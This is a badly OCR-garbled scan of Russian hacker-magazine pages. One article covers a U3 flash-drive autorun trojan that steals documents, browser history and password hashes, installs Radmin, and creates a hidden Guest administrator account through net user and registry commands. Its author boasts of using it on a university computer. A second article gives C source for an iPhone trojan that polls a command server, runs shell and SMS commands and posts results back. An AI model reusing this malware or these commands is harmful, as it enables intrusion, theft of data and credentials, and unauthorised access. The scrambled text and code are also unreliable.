
быть недостаточно. Хорошей практ!'!кой является в до·

SOL

IПJесtiоп данный вектор более чем применим Аля

ческого ресурса для распознавания капчи ["меТОАлем­

полнение к капче использовать!'! Аругие механизмы, за­

мингов"j. Это замечательный!'!очень эффективный вектор

трудняющие автоматизи рованн ые Аействия, На пример,

обхода сарtсl1а-фильтров, которым с момента широкого

могут испольэоваться различные временные задержки

распространенияэтой технолог!'!!'! С успехом ПОЛЬЗУЮТСЯ

при выполнеНИL1 множеСТ8а ОАНОТИПНЫХ дайствий за

спамеры всего мира и который ставит ПОА сомнение само

короткое время, запрос, какой-пибо информации, изеест·

пр!'!менен!'!е сарtсhа-фильтров.

~IОЙ пишь авторизованному пользоватепю L1 др,

ХАКЕР

06 /126/

О9

:::r.:::

~

057

!

'-=:-> ~з ..... О_М

~

058

Езлоt·.-1

Однажды вечером я сидел дома. почитывая

КiпgSlоп, в задачи которого входила

за кружкой кофе очередной номер журнала

прошивка моей флешки дл~ совместимости

"хакер", и вдруг наткнулс~ на статью про

С

попытки взлома U3-флешки и софта под нее.

самое интересное

Vlsta

nepe­

И именно с его изучеНИR началось

тая. И простор для хакерской деятельности

ПОДАРОК ХАКЕРУ­ ПАТЧ ОТ РАЗРАБОТЧИКА

на ней просто безграничен. Уже через день ~

Итак, у нас есть неизвестное приложение.

npocTaR.

а буквально золо­

и пустой рабочей части Как прин~то в ком­ пании Кlngstоп. все должно быть доступно дл~ взлома, а это значило, что уже через

1О минут ковыряния в блокноте я создал

CTaTb~ меня сильно заинтересовала тем, что флешка была не

диска, пустой перегородк., между дисками

корректный файл автозапуска для защищен­

ного диска. Он наnравл~л выполнение кода сначала на мой обработчик, а затем уже на

приступил к опытам и изучению этого инте­

При запуске оно опрашивает носитель,

файлы LаLJПсhU3-0бработчика итакдалее.

ресне~шего оборудования. Как оказалось. в

копирует данные с него к нам в комп. а после

Теперь пора поговорить

caHO~ системе таких флешек существовала

перепрошивки возвращает все по местам.

исполняемом коде, определить концеп­

уязвимость, которая потенциально позволя­

Сопровождается этот праздник жизни

ции развития и общую структуру постро­

ла взломщику сделать инъект в содержимое

всевоз~r.ожными глюками и красивыми

ени~

защище~IНОГО раздела флешки и заставить

окошками, которые просто инезатейливо

систе~~ы я выбрал командную строку

информируют юзера, что ему следует делать

WlпЗ2 Сделал я это по целому p~дy при­

это содержимое ИСПОЛНЯТЬСR

на ко;r.пьютере

05 обработчике и

В качестве языка для написания

жертвы. К слову сказать, Большо~ Браттоже

дальше. Пристальное внимание Я обратил

чин, в числе которых

не спит, поэтому все флешки такого типа

на сам исполн~емый файл. Он заставил

ния этого языка и легковесность готовых

перестали попадать к нам на прилавки уже

меня улыбнуться. ЭТО незащищенное

исполняемых Ьаt-файлов_

через

Wlnгаг-приложение, имеющее тип саморас­

2 недели

Сейчас их нет ни в одном

- npocToTa

изуче­

НЕПРИСТОЙ~НЫЕ ЗАПРОСЫ

магазине города. Но заказатьтако~ U3-шный

паковывающегося архива, в котором было

флеш-диск на

необычное содержимое. Весь взлом состоял

КОМАНДНОИ СТРОКИ

nроблемi

в распакоаке и правке нужных Iпi-файлов

Прежде чем мы полезем вдебри, давай расоr.отрим

ПОРЫ8ШИСЬ в Сети, я не нашел никаких

блокнотом Чем дальше ~ изучал их систему

основные приколы командного языка и методы об­

постов по этой теме и начал сам ковырять

обновлений, тем больше мне зто напоми­

хода тех или иных ограничений. Первая проблема,

флешку, а именно

нало приколы из серии «почувствуй себя

которая долгосотрясала мой мозг - это обращение

/" гига в инете нет никаких

-

пробовал ее скопиро­

вать, разбить, переформатировать, юменить

кул-хакером". В архиве лежали интерфейс

к русско~зычным ПУТRМ В проводнике из пакетного

загрузочную область ... В итоге, все мои

обновл~лки,функционал.которыЙполучал

файла. Если, допустим, с консоли ввести

попытки были обречены на провал, пока

доступ кзащищенномудиску и isо-обра­

мне в руки не попал замечательный nатч от

зы

ХАКЕР

06 /126/ 09

-

соответственно, для защищенного

~

059

»

@lf «%pr%»==»disconecCed» @star·t calc&&pause -

то на диске действительно создастся указанная выше

@goco

т1

папка, но в нашем случае нужен пакетный файл Сле­ довательно, вместо желаемого результата. мы получим

в этом коде используютсяпоисковые запросы, выпол­

какую-то кракозябру на неизвестном языке Но все будет

ненные в кириллическихсимволах Они всенепременно

прекрасно работать, еслиты пропишешь кодировку

1251

исказятся в какую-то вну'Греннюю кодировку комаНДIЮЙ

строки Чтобы это обойти. выдели нужное тебе слово

~

links

• Это адреса интер­

chcp 1251

ДМI поиска в окне командной строки исполняющегося

тд С: \аДНИНИС'l'ратор\

пакетного файла правой кнопкой мыши и вставь в блок­

НОТ. Это может быть буква. строка и прочие символы,

нет-магазинов, где

продаются подобные

Скажупару слов об использованиивывода строки в своих це­

за исключениемуправляющихсимволов ко;~андной

флешки. Есть экземп­

Л>JХ допустим,ты работаешь с окном командной строки, и тебе

строки вроде скобок. Но даже в этом случае ты можешь

ляры на

надо получитьчисло из ответа Ko,~aHДЫ. Попробуем написать

использоватьсинтаКОIС циклов FOR, которым наплевать

1,2,4 и вроде

быдаже на

16 гиговl

• пlt.JV

" digilec.ru "lliobiloff.net • А на iхЫ.согл(

программу,ко'Горая мониторитсвязьскомпьютеромпо сети и в

на содержи,~ое

случае обрыва что-нибудьвыполнит:

заранее заготовленные спецсимволы из

их переменных,

Ка к при мер, ищи на

rem

програмна опрашивает заранее известный

файла.

Apyroro

мою систему пересоздаНИI1

плейлистов, для построения которых мне необходимо

сервер И результаты пинга связывает с датой и

польэоваться

временем

принципе!

storag~(flashd rives­

OVO

или просто скопирова'Гь

тем, что командная

строка не пере носит в

Также, из-за чрезмерной обширности вопроса, могу

р17.shtглl, проиаво­

rem #

дился интересный

@эес саrgеt=194.67.57.2б

укажите сервер

лишь упомянуть о возможности

режиме ожидания окончания

запуска скриптов

предыдущего,

как в

так и в мно­

тест-обзор флешек, в

chcp 1251

гопоточном режиме. Не'Г никаких проблем написания

числе кО"Горых оказа­

co1or fD

таких программ, которые при ВЫПОЛliении

лась и из.

t. i t 1 е

вали бы свое потомство, притом, далеко не по линейны,~

Блокнотик

программиро­

chcp 866

алгоритмам

:т1

и прочими полеаными вкусностями. Даже базу данных

Нет проблем и с математикой, матрица"tи

состряпать в ней можно без труда, хотя не без I-еморроя.

@set

Всегда К твоим услугам справка

рг=уаr,п=l,б

@for /F' "usebackq Cokens=l. 2. З, 4,5.6,7*

delims= " %%1 IN ('ping %Carget% DO (echo %%4 %%5 set

рr=%%б) &

%%61 findstr

%%6Ifiпdstг

-п 1')

'уа(,п=»&&@

Windows по KOMaHiJHov,

строке и моя почта. )'1 будутолько рад вопросам, потому что хочу расширить доступный мне функционал коман­ д~ой строки ее же средствами. Считаю использование

(echo %%1 %%2 %%3 %%4 %%5

этого языка хорошим подспорьем для затруднения

"uа(ули( БV<Е:©. ['J:>®бвгl(, "&&@set

отладки как отдельных программ, так и всей системы 8

целом В свое время я писал большой проект. на который

pr=disconected)

неоднократно покушались другие программисты, но все

@for /F "usebackq tokens=l,2,3* delims==

" %%1 IN ('echo %clme%') DO@set

д_

они, в итоге, нервно курили в сторонке, так и не поняв сути моих екриптов.

r_="Date_%date% time_%%l ping_%pr%» & title Date_%date% time_%%l ping_%pr%

СОЗДАЕМ свой

_

ИСКУССТВЕННЫИ

с1,;

ФЛЕШ-ИНТЕЛЛЕКТ @геm ~еспи расконментировать следуюшую

На руках у нас

строчку, то будет создан ЛОЕ на диске цэ

файла, который поступил от приложения С защищенного

@rem

#@есЬо

@есЬо

~

060

%d_t 9o »

с: \геа1 tiюе_lоg.

txt

%d_t%

- вызов на исполнение защищенного

раздела. Сначала мы определим букву диска. на который подключилась наша флешка, и откуда ей суждено рабо­

IF'bI

@гет #в случае обрыва по умолчани.ю запускает

тать.)'I сделал Э'ГО, используя обычные

калькулятор

пара метром в пакетный файл. наход~щийся ~a основном

и передал их

ХАКЕР

06 /126/ 09



>> в::лоt""1

80ТТАКЯ КОГДА-ТО ПИСАЛ RАR-ТРОЯНА разделе диска "JUMPER,8AT », В нем я определил режим работы и тактику поведения. Соответственно,Я могу или вызвать атакующий модуль, или же, например, открыть

ГЛIOКIJ. Е:ЫЯЕ:л€'нные

реж>\м хозя>\на-владельцафлешки, в котором играет

Ti?(:TIJp OE:aHUi?tv:I­

музыка, запускается аська и коп>\руютсяЛОГИ со взло­

Изначально система писалась под WindowsXP Ноте,

манных машин прямо на мой рабоч>\й стол! Допустим, что

но после ее тест>\рования на WiпdоwsХР Рго выяв>\лись

флешка попала влапы негодяя Предлагаю расо,отреть

некоторые глюки Напр>\мер, система долго и исправно

лишь некоторые моменты файла "WARBOTbat», напр>\­

работала на всех компах, пока со мной и "'10>\"'1 товарищем

мер, его начальные настройки:

исключительнос целью

днем нам вы пала возможн ость попасть в другой корпус

set make_tir_in_allusers_autorun=l -

POAHOI'O университета

вать ли Трояна в а.втозагрузке

и получить доступ к компьютеру,

через который так или иначе проходят все методички,

телей

созда­

всех пользова­

set make_tir_in_user_autorun=l -

бы неплохо навар>\ться. Пр>\дя в корпус, Я передал при­

ли Трояна в автозагрузке текущего лользо:вате­

ятелю флешку, после чего мы пошли «на дело» Сначала

ля

меня. как сейчас помню, He~'HOГO озадачила надпись

set stealth_konsol=O -

Windows2000 на з кране мон итора, но уже через м гнове­

пьютера жеР'ЕВЫ файлы консопей управления?

(0\1)

set stealth_histiry_ie=l -

>\ Р.. недолго ду~,ая, 8руб>\л принуд>\тельную атаку, Время

,"орию посещения 6раузера ТЕ?

шло, флешка работала, а мы выполняли собственно то,

set attack_for_guest=l -

зачем нас направили в зтототдел. После окончаниР.

на гостя?

работы мы с нетерпен>\ем вернул>\сь в родные корпуса

set stealth recents=l -

(0\1)

производить ли атаку

На дискетебяожидает

(0\1)

копировать ли ярлыки

О да I Флешка сработала чудесно! По сещ МЫ прон>\кли в

недавно ОТКрЫТЫХ документов?

ет «осмотреться»)

лись В действительно интересные фотографи>\ сотрудн>\ц

set stealth_system_info=l -

отдела. И так продолжалось до самого обрыва связи. «Ну,

лаги

>\

ных?

со

счетчиков

{иногда ПОНQга­

(0\1)

системы и

значения

аспектов разработки подобныхприложе­

(0\1)

няли по тревоге

скопировать мд5-хеши паролей с системы?

set type_of_file_for_stealth=.doc . txt ­

подключились к вузовской сети и стали пытаться зайти на

указывает файлы,

тот компьютер НаС>Кдал облом

ны с компьютера на флешку



\1)

которые ДОЛЖНЫ быть сграбле­

под WiпЗ2 и прочие вкусности.описанные

в статье Тебе остается лишь взять и УЛОЖVlть

но не отвечал. Сильно озадаченные ~Ш пошли в другой

set type_of_file_for_filtration=.lnk .LnK

корпус

.lnp3

Придя, ~Ш наблюдали следующую картину. компьютер,

.mpeg .mpg .cda %usbdisc% winword WINWORD

.уоЬ

НИЙ,скриптован>\я

nЫ'Т'аться ли

чтобы подправ>\ть какие-то поля. ПОЧуЯ8 неладное. мы

.WПlа

а также все необхо­

касающиеся всех

перемен­

set steal th_md5--I>asswords=1 -

- компьютер п>\нговался.

моя "ега-сVlстема,

димые материалы,

копировать ли

мы пошли подомам. На следующееутро моего друга под­

- надо было срочно явиться в l'ОТ отдел,

твенност>\не несутl

копировать ли ис­

одну из самых защищенных ~ышин и с кайфом БГлядыва­

сказал Я товарищу,

создавать

копировать ли с КОМ­

гнезде USB, Флешка не захотела атаковать компьютер,

-

автор, н и редакц",яза

(0\1)

ние флешка весело и бодро м>\гала своей лампочкой В

завтра все скоп>\руем»,

ознакомления/Ни

твои действияответе­

(0\1)

дипломные работы и вкусности, на которых можно было

-

warning

Вни~,ан>\е! Инфор­ мацVlЯ представлена

не случилась следующая история Однажды майским

ничего

~

.wav .mid .midi

.тр4

. avi .ogg

предоставленныйма­ териал по папочкам.

возле него несколько человек. Они смотрел>\ на нас

глазами маньяков. которые давно никого неубивали. На 8се последующие 80ПрОСЫ мы сделали лица кирп>\чом и стали нести ну просто полную ах"нею про интернет, его

.&.

CPO'iHO

Е: HOMi?p!

раЗ8итие и вирусы Нас выслушали и поверил",. Когда

(

мы спросили, а что же случилось, нам рассказали, что

Совсем недавно стало известно, что можно сделать чу­

умашины внезапно слетели все пароли. Они вызвали

до-флешку из любого накоп>\теля, Теперь не обязатель­

местного сисад~,ина, который добрых три часа возился с

но по купать дорогую UЗ-флешку - сойдет даже трЗ­

таблич~ой ввода пароля, и. видимо, совсем отчаявш",сь,

плеерl Универсальный софт для ~ЮДVlфикации флешек,

наугад ввел ",мя пользователя "Гость» И нажал

загруженный с сайта liltp:l/flashhoot.ru/irrdex.php?nam

«Enter»

Система неожиданнопорадовала его не тол ько успеш­ ным входом, но

>\ админск",ми

Вонакие пирог>\.

ХАКЕР 06 11261 09

полномочиями в пр",дачу.

e~Files&op=cat&id=6&раgепum=2,я заботливозалил на диск. Как его юзать -

домашнего задания

разберешься в рамках моего

;1. Или п",ши

на почту - помогу.

~

061

-­ е; EKplorc drive 1:

8

Settings»

..if) Add Progr.ams » е Help and Support »

~='----I~U3;;:_=:А;::':::....,:=.=.'~..:сyOU=.-;_;:;.:-;~:с.~bneI;·:;--,1 Iгtroduc~

to YCU n!!Nf uэ Sl"nart drive.

~ ЕпаЫе Security

I

,..-~

a::rngston U3 (enter

------,

\ ~ Dow.1load Pragrams

)

-----.".,==с"

..

Uз:'ШНОЕ МЕНЮ МОЕГОДЕВАЙСД set

nO_\.1.se_LanМod_for_Rad1nin=O-

наВJIИВа.ть радмин по сети на

set use_only_rad1nin=O КО иЗ установки радмина

мне не ПЫ'И1ТЬСЯ уста··

соседние машин.ы?

вся а.така должна сосгонть ТОПЬ­

?

set no_create_message=O -

в процесс е рабо'Т·ы не исполь­

зовать место на диске дпя создания сообщений

про попьзова'Т·епя совсем за­

set no_display_message=o будем? Ну и правильно

-

ему нечего знать не надо

Отдельно хотелось бы рассказать об атаке на гостя, которая является гвоздем нашей про граммы:

создд..ЕМ ГЛОБАЛЬНЫЕ ПЕРЕМЕННЫЕДЛЯ РАБОТЫ НАШЕИ ФЛЕШКИ

if %attack_for_9uest%==O goto тЗ - искпючающее chcp 1251 - подключим кодировку для кириллицы пеt

Cookies cookies .jpeg .jpg

.Ьmр

.gif .pic .pict .ico

uSer

гость

/ act ive

:уеэ

-

ИЛИ

активируем учетную запись

гас'Т'Я

фильтры! ч:тобы не перегрузи'Тъ флешку ВСЯКИМ хламом

rem #.jpeg .jpg .Ьmр .gif .pic .pict . ico .gif .html .htm - другой набор фильтров под другие задачи set find_evristic_analyze_in_file_types:l ли искусственный интеллект для типов фаилов

set

?

к

структуре

тн

localgroup

равным

аДViинистраторы гость /адб

администратору по

-

сделаем гос­

правам

включить (О

\

1)

find_evristic_analyze~in_file_folders=l - дать ли

искусственном.}' интелпе.к'I'У доступ

пеt.

ПdПОК?

(0\1 )

@reg add Wiпdо,,,s

«ИКЕУ_LОСАL_МАСНINЕ\SОFТWАRЕ\МiсгоsоЕt\

NT\CllrrentVers iоп\Wiпlоgоп\SресiаlАССОllлts\

UserList» /v

гость

/t reg_dword

/д О /Е

-

скроем появив­

шуюся учетку с ГЛdЗ долой от юзера

set recent_folder_for_analyze=%homedrive%%homepath%\

Recent\

net user

set no_find_documents=O -

1234 -

приправим паролем ло вкусу

ОБ УДОБСТВАХ НЕ ЗАБЫВАЕМ

менты вообще?

set no_copy_all_documents=O -

вообще rтpопускаТh копи­

Ну, хорошо, МЫ в какой-то степени удовлетворили наши заllрОСЫ по

рование каких-либо документов?

взлому, НО помимо всего прочего, моя система обладает массой прият­

set not_attacking=O set no_use_radmin=O -

не а'rаКОБат,,?

ных феliечек и фишек, таких, как автоматизированный вход в аську. На

мне нельзя устанавливать раД~fИ1-f

диске ты слегкостью должен найти файл

тронна в целевую систему?

~

гость

мне не искать текстовые доку­

062

«pqp bat".

Именно он управл~етвводом пароля ЭтотскриП1" 11росматриваетсвое ХДКЕ Р

06 /126/ 09

rli8lll

~

»

Е:3ЛОМ

, Стэндзрт uз fp}ll1n't

~USВ

• 90ttтаНО&Л8ние даННI неисправ:ных носитеП81

Flasl1 DfNe Кlщ,tstоn»)

8: поаЙС-l1ис:те

·

в' кэтэпоге

В ОГ\\1с8нYl" не УlI:аэзн~,

скорость рвоoтыlБвB

r.педуlOШИЙ тоеар

Drlve,

прe..qъщущиЙ ТОtlзр

• Как

ДОUOlВШь. В cp'tBWeHIlt:; О ораtМИТIo

F'

на какой скорос-п

работает?

, Мn" ~oo.

I

СП'1:.~~_[~~~Р~I)

!

"делать

USB Flas!

эзrруэочныM

• ФrI'JWХВ ДOI"DКHa ЖНТЬ ';

AfI~ О'ТlAtи ... Cp ... MIНltA

версll.Я для пе:Ч3JJ1

'­ АРJIIКУЛ: ?t-l450-1 НllПllЧllе H.J. скn.ще: В Д(1ННЫЙ 1,IOI,teHT Q1cyrCIByer. ПосrynлеНllЯ в ЛI'ОДt)ЖУ H~ t)".t!11Д.)~I~~R.

1i ООСI.IО1ЕННЬ

пос:педнюю цеку

r::--------------------~---·--------I ~~~ыe_.

..1.

Проиээодитеnь

Кiпgs!oп

Модель

DataTraveler .Ч~ ~~.~.~.~:~ 1Gb

US8

брелок с по.дцеРЖIОЙ технологии

U3 (You free)

ПОЭ90ПЯiOЩИИ эапускаtъ с Yt1PОКС1ВЗ проrрэммы Форм..-ra uз

Опнсанне

х'р.'ЗН:=t~е 91;8 денные H2Il1ash приводе и свободно переНQСИJ.ilые с однот ПКна дРуrоЙ.

ТИп харты ПВМАЩ

у'З.8

Обьем Flаsh-нsкопнтanя

1ГО

цсета иепoJlьэовэнныe в

...

Flosh Or1re.

Серебрнсты~.черный

оформлении Сро!( rарэнтнрозэнного )фанени~

До

данных

МЭkсимanьные _пе..;р_е..;.'Р.;.У3_·к_"

10 пет

1_00_0_G_П Р_".;.р_.о_о_re

..

_

lb.~IJ.-I!IIе~~~'lЬНОС111

ФЛЕШКА В МАГАЗИНЕ С НЕТЕРПЕНИЕМ ЖДЕТ СВОЕГО ПОКУПАТЕЛЯ

тело и последовательно осуществляет клавиатурный ввод односимволь­

п ропи сать та м нужн ые идентифи каторы. 80Т список уже поддержи­

ных комментариев в тексте про граммы. Если раскидать по этому файлу

ваем ых:

комментарии таким образом. БАSЕ

rem '!

DRVG

rem 1

GUARD

:r:el11 3

spy

rern 3

тет

По сути, это rл05зльные nepeMeHHble твоей операционной системы,

k

которые восстанавливаются при каждом входе в нее Пользуйся на

rem g rеПl

r

тещ

s

здоровье,

ОБСУДИМ ИТОГИ -

то на выходе мы получим пароль "V13Зkgгs». В итоге, пасс хранится

МЫ получили, своего рода платформу, которая будет отлично работать

в нестанда ртном виде и нетребует при вводе нашего участия.

не только на Т80ей машине, но и где-тотам, в чужой квартире, похищая

Следующая приятная фишка. если на флешке окажется места

нужные тебе данные, И неважно, кто ты, мой читатель,утебя всегда

мен ьше эаранее оп ределенного объема. то автоматически от­

найдyrся вопросы и задачи, с которыми могла бы справитьсямоя система.

кроется утилита для удобного рассмотрения содержимого диска

Допустим,ты студент-раздолбай,тогда флешка поможеттебе достать не

«sсаппег ехе», Ты меломан, как и я?Тогда тебя порадует встроенная

только курсовые

поддержка плейлистов от

поставляется в комплекте с курсачом, Если ты уже поимел всю сеть вуза

Windows Med'la Player и воэможностьих

yTBoero

препода. но и чертежи и прочую хрень, которая

пересоэдания специальнымскрнптом или вовсе автоматически.Вся

и помогаешь COTPYAHI~KaM через RаdmlП раскладывать пасьянс, то

музыка для этого заботливоукладывается в папочку MUZON Если у

можешь пойти прогуляться до ближайшего салона сотовой связи. Есть

тебя 8ключен идентификатор типа «% BASE"/o~=8ASE", то система

шанс заполучить в свои мохнатые руки их платежных клиентов

автоматически скопируеттебе на рабочий стол в отдельную папочку

году оценивай сам, Если тебе и этого мало, то хочу отметить целый ряд

все награбленное добро с флешки

ситуаций, когда. не дай Бог, сотрудник Сбербанка согласится принять

51

в свое время успешно ее ис­

пользовал для решения повседневных

задач системного админист­

-

8Ы­

с твоей флешки отсканированный тобой чек.

ратора, вроде полностью автоматизированной установки и настойки,

Более того, сейчас все на каждом углу в ужасе кричат от эпидемии вируса

например. антивирусов

Сопfiсkег, а чем ты хуже? Неужели, имея в своем распоряжении такой мощ­

на компьютерах

юзе ров

Чуть не забыл I Чтобы собственная флешка не ополчилась на тебя,

ный инструмент, ты не 8 состоянии нап исать свой тренировочный ботнет?

неоБХОДИI~О залезть по адресу «Пуск ~ Настройка ~ Панель

Одним словом

управления ~ Система ~ Допоnнительно ~ Переменные среды» и

если немного позаниматься мазохизмом, сойдет любая флешка.::Х::

Х.АКЕР 06 112М О?

- срочно беги искать флеш-диск U3шного типа. Впрочем,

~ 06з

>> В;;:ЛОIY1

~////л Х DOZNP / HTTP,1I0XOD.RU I

каНЬВЯБлаКАХ П!И1ШЕМ ТРОЯН длЯ'

APPLE IPHONE

в прошлых статьях я описал основные уязвимости App:le iPhone, дал инструкции по созданию автоматическогосканера безопас­ ности на базеточки доступа и рассказал о концепции ботнета для телефонов. Сегодня я подробно опишу создание трояна для

Apple iPhone . •

ФОРМАТ

_

5.

УПРАВЛЯЮЩЕИ КОМАНДЫ

Пятая и шестая части

для отправки конанды

,

- apryMeHTbI

Первые три параметра

-

управляющая часть,

инструкция типа «что сдепать». Вторые три

например:

Первое, с чего надо начать написаниетрояна­

• %791.02020202%

разработка формата команды. которую сервер

дунарсдном формате

«куда скинуть результат выполнения». Если

будет передавать клиентам [заражен ны м тел ефо­

• %192.168.1.1 OO%/master-server /res.

с этим все понятно, то нечего тянуть резину,

нам). я предлагаю вотта:<ой вид

php?res=%

нонер телефона в неж­

параметра

-

OTBeTHa~ часть, инструкция типа

переходим к кодингу.

ПримерЬ! команд:

1~

Команда состоит из шести частей

раsдепе!-t-НЫХ С:V&IВОЛОМ

2.

I

на номер

перsая час'I'Ь:

• at% ДТ-команда. для модема

• sm%

команда отправки еме

• sh%

конанда тепла

(например,

• sh%ping

-с10

15.

Р~lр?гез=% -

«ping www.ru» полнения на

команда аастройки работы самого

команды ИЗ первой части.

• sm%79101010101%TEST is

На.прИМЕ:р:

Все функции Я разнес по отдельным файлам в

зависимости отсмысловой нагрузки. Основной файл trojan.c максимально облегчен от ненужно­

'"lWW. ru%0%ws%192.

го кода. Вот список файлов и их назначений

и выслать результат вы­

192.168.1.100

• tg%3600%0%0%O%O% артуме:rrы

АРХИТЕКТУРА ПРОГРАММЫ

8Ь!ПОrrnить комаыду шелла

.. \:g%

-

ОК"

+79101010101

whoarni. ping 'NW''''.ru)

з. третьи 'и вторг.я части

ОК%О%О%О% ­

"test is

168.1.100%/master-server/res.

трояна

trojan. с'

Основной файл с

установить ин­

тервал полуqения конанды с сервера

Makef:ile

ИНСТРУКЦИИутилите make для

равным 3БОО секунд

. /cmd:

Разбор С'lраки с командой и эа­

i!олнею-rе структуры

4. LfетвеРТБЯ час'1'Ь - ТИП отправки

использовать команды шелла. поэтому оставил

cmd-parser.c

результата КОМОЕДЫ,

все спецсимволы на ИСГiользование в скриптах

crnd-parser.h

знаqения:

..

%~7S% отправка ht.t.р-эап:росом пара­

метра

• %sm% ния

064

GET отправка «ВНУТРИ» SМS-сосбще­

функ­

сборки трояна

Пару слов О разделителе. я максимально хотел

нонет ПРЮiИ1'1ать

main ()

цией программы

ок%<хвост

команды>

~

• sm%79101010101%test is отправить емс стекстон;

"%"

(чтобы можно было выполнять разные там

devJrandom

catl

> Itmр/fuсk-mеmоrу-есопоmу или

. /!.1L tp:

HT'l'P·-клиент. Отправка эапро­

l51 I grep (х! и np.l. Таким обраэом, разделите­ лем стал про цент - %. Что касается общей кон­

ht.tp-c1ient. с

цепции команды. то здесь все тоже очевидно

Ilt t.p-cl j.Gпt.. h

СОВ,

ВОЗ.8ращениерезультата

ХАКЕР

06 /1261 09

11

ПРОСМОТР ВСЕХ ЗАРАЖЕННЫХ ТЕЛЕФОНОВ

БРОДКАСТКОМАНДА.ЕЕВЫПОЛНЯТВСЕУ(~

РОЙСТВА

ВАДМИНКЕНАСЕРВЕРЕ

*( (struct in_addr *)he->h_addr);

Работа с АТ-коиандаии. OTlГpaB­

· / sms:

ка сие, получение IИЕI и

mеmsеt(&(thеiг_аddг.siп_zеrо) ,

CeID

SH1s-fuпсs.с

на базовой функции

iE(conneet(soekEd, (strllct soekaddr *) &their_addr,

· / s t ruc t s:

sizeof

Описание СТРУКТУРЫ команды

оптимизируй. Так что, это оставим надомашнее задание, Теперь сам парсинг. Он основывается

'\0' , 8);

SПls-fUnСS.h

дошли. Как говорится, сначала напиши, потом

(SПllсt

sockaddr)) == -1)

strlok. которая выполняетза

нас разБиениестроки натокены по спецсимволу

%. Вотисходник:

eXlc(l) ;

eO!"INAND

stЛlеt COММA.ND

eommand.e Н(

· /utils:

Утилихы. CO~"1cat ДЛЯ KoppeKT~

(nnrnbytes = send(sockfd, msg,

str1еп(msg), О))

== -11

шаllое (SIZE)

l.ПL:

ного СЛИЯНИЯ ДВУХ строк в одну

uti1s-concat.c

uti1s-concat

parseCmd(char *resp) (

ehar **parsed = (ehar *)

exit (1) ;

;

i=O;

for(i=O; i<SIZE; i++1

.:"1

parsed[ij = (Char*)

ПИШЕМ ПРОСТЕНЬКИЙ HTTPCLIENT

iпt

bytes =

О;

ma11oe(t1AX_SIZE);

bytes = (recv(soekEd, buf,

ЗаБирать команды с сервера наш троян будет по НТТР. Поэтому надо написаТь простенький

(strstx-(resp, "emd: ") 1=NULL)

МAXDATASIZE-1, О));

UCНAR

if (bytes < 1)

клиенТНа сокетах. Готовые вещи в нашем случае бестолковы, а форматhttр-запроса, думаю, ты помнишь наизусть. Если не помнишь -

ехН(l);

(str1en(resp)-170) );

ничего

страшного, напомню. Использовать ~Ш будем

char * else i f (bytes
только стандартные библиотеки: netdb h. sys/

i =

"%");

parsed[iJ=pch;

exit(l);

(char *host,

= strtok(cmd.,

[

eJse

сЬас* sепdНt tpRequest

реЬ

О;

while (pch!=NULL)

types,h, r.etlnet/ln.h, sys/socket.h. Вобщем, полу­ чится при мерно та к:

eJl1d[1024];

strnepy(emd,&resp[172] ,

рсЬ=

e10se (sockfd) ;

strtok (NULL,

"%");

i++;

char *ur1) strnepy(CO!~~D.ct, parsed[OJ,

return bllf; inl~

sockfd,

пUП1Ьуtеs;

sizeof(COММAND.et»

char buf [ИАХDАТАSIZЕ] ; struct

strncpy(COММAND.p1,

Тут накладываютсяограниченияв

hоstепt *Ье;

2 КБ на строку

st;ruct sockaddr_J.n thei:c_add:c;

URL и ответ сервера. Если их будет малодля

ehar* msg[2048J;

твоих целей -увеличишьбез проблем Только не

sprintf

(шsg,

"GE'!' %s HT'IPI1.1 \r\n" ,

забудьочищатьnepeMeHHbIe, все-таки чистый С,

никаких тебе сборщи ков мусора

l.Jrl) ;

.1.

(str1еп(hоst) 1=0)

if

(rпSQ,

"%sHost: %s\r\n

ll

,

Послетого, :,ак мы получили строку с командой. ее надо разобрать и заполнv,ть соответствующую

msg, host);

структуру. Сама структура выглядиттак:

sprintf (msg, "%s

Сасhе-Сопtrо1: по­

сасhе\r\пUsеr-Аgепt: bad-trоJап\r\п\

ehar ct [3J;

Н{ (he~gethostbyname{host»)~~ NlJТ~L)

exit(l); О))

=~

sizeol(COММAND.r1)) strпсру(СОНI1AND.r2,

;

parsed[5J,

sizeof(CO~U\ND.r2));

Eor (i=Oi i<SIZEi i+-i-)

= NU:L:L;

ehar

р1

[257] ;

char

р2

[257 J ;

ret1.lrn

COММANO;

return COHMAND;

char

у2

[257];

};

their_addr.sin_fami1y = their_addr.9in-po~t

char rl[257];

-1)

exit (1) ;

8роце все понятно? Никаких особых приемов здесь не использовано Только прошу быть аккуратнее с переполнениями Буфера. Код

AF_INEТ;

= htons(PORT);

their_addr.sin_addr =

06 /126/ 09

,

elblr rt [3];

if ( (sockfd = soeket (АР_INET ,

ХАКЕР

раrsеd[З]

sizeof (COММANO. rt) );

parsed[~]

received~O;

SOCK_STREAМ,

sizeoL{COММAND.p2)); strпсру(СОММ1L~D.гt,

struet COMMAND{

r\n" , msg) ; i lt

sizeoE(CO~~.ND.p1}};

strперу(СОММAND,р2, parsed[2J,

strnepy (COММANlJ. rJ., parsed [4] ,

ПАРСИМ КОМАНДУСЕРВЕРА spr"intE

;

parsed[l),

По-хорошему.тип команды и тип ответа надо

трояна по этой части еще придется хорошенько

было выставитьв iпt, но до этого РУКИ У меня не

допилить,

~

065

СПЕЦИАЛЬНАЯ КОМАНДА. УНИ­

КАЛЬНАДЛЯ КАЖДОГО ТЕЛЕФО­

НА. МОЖЕТ ЗАСТАВИТЬ ПЕРЕДАТЬ ЛИЧНЫЕ ДАННЫЕ

ПОСЫЛАЕМ АТ-КОМАНДЫ МОДЕМУТЕЛЕФОНА

я очищаю очередьсообщенI'1Й.чтобы не заморачиватьсяи не разбирать

строкуответа модема на командуАТ+CMGW. По правильному. она возвра­

в ~,apTOBCKOM номере Я уже приводил исходник программы для отправки

щает номеРТ80его набранного емс, далее его и надо использовать для

еме На всякий случа Й. повторю основные моменты, М ы используем

аргумента АТ +CMSS. Утакого подхода есть небольшой нюанс

резервное системноеустроЙство/dеv/ttу,dеЬug. через которое посыла­

красно работает, но сам телефон еме отправить после такого уже не может,

- троян пре­

ются АТ-команды Основное устройство /dev/tty заблокирова но родным и

Приходиться переэагружаться, В общем, этотбагя оставил специально.

демона м и телефона и использовать его не получится, М ы инициализируем

чтобы тебе тоже было чем заняться

соединение на скорости

Помимо отправки СМС, допишем еще две функции, чтобы получать IMEI

115200 бод вот так'

J

телефона и ссю Это уникальные номера, их можно использоватьдля идентификации каждого за раженного образца:

iJ1C InitConn (iпt speed) int

Ед

= open("/dev/cty,debug", O_RD\\'R I O_NOCTTY);

if [fd == -1) { \п",

fprincf(stderr, "%i (%s)

